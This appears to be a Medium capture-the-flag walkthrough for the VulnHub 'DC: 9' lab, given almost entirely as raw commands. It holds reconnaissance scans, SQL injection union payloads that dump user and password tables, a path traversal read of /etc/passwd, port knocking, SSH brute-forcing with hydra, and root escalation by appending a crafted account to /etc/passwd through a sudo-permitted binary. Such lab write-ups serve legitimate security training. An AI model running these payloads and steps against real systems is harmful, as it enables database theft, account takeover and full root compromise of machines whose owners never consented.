VulnHub: DC: 9

nmap -sn 10.0.2.27/24
nmap -Pn 10.0.2.49nmap -Pn -p1000- 10.0.2.49
nmap -A -p22,80 10.0.2.49
nmap --script vuln -p22,80 10.0.2.49
nikto -h http://10.0.2.49
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.49/ -x php,txt,html,sh,cgi,bak -q
' or 1=1--
' union select 1--
' union select 1,2,3,4,5,6--
' union select 1,@@version,@@hostname,database(),5,6--
' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata--
-- to -- -
' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata-- -
' union select 1,2,3,group_concat(table_name,":"),5,6 from information_schema.tables where table_schema='Staff'-- -
' union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name='Users'  and table_schema='Staff'-- -
' union select 1,2,group_concat(UserID,":",Username,":",Password),4,5,6 from Staff.Users-- -
' union select 1,2,3,group_concat(table_name,":"),5,6 from information_schema.tables where table_schema='users'-- -
' union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name='UsersDetails'  and table_schema='users'-- -
' union select 1,2,group_concat(id,':',username,':',password),4,5,6 from users.UserDetails-- -
cat raw.txt | cut -d ":" -f2 > users.txtcat users.txt
cat raw.txt | cut -d ":" -f3 | cut -d "," -f1 > passwords.txtcat passwords.txt
1:admin:856f5de590ef37314e7c3bdf6f8a66dc
wfuzz -b "PHPSESSID=mfbitk09jct79hpf6i20fr3lko" -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt http://10.0.2.49/manage.php?FUZZ=index.php
wfuzz -b "PHPSESSID=mfbitk09jct79hpf6i20fr3lko" --hw 100 -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt http://10.0.2.49/manage.php?FUZZ=index.php
wfuzz -b "PHPSESSID=mfbitk09jct79hpf6i20fr3lko" --hw 100 -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt http://10.0.2.49/manage.php?FUZZ=../../../../../../../etc/passwd
/etc/knockd.conf
for p in 7469 8475 9842; do nmap -n -v0 -Pn --max-retries 0 -p $p 10.0.2.49; done
hydra -L users.txt -P passwords.txt 10.0.2.49 ssh -t 4 -u
ssh janitor@10.0.2.49password: Ilovepeepeels -la
cd .secrets-for-putinls -lacat passwords-found-on-post-it-notes.txt
hydra -L users.txt -P janitor_password.txt 10.0.2.49 ssh -t 4 -u
ssh fredf@10.0.2.49password: B4-Tru3-001sudo -l
sudo /opt/devstuff/dist/test/test 
echo "Hello World" > for_readsudo /opt/devstuff/dist/test/test for_read for_appendls -la cat for_append
openssl passwd -1 -salt new password123
nano strings_to_append
sudo /opt/devstuff/dist/test/test strings_to_append /etc/passwd
cat /etc/passwd
su newuserpassword: password123cd /rootls -la
cat theflag.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store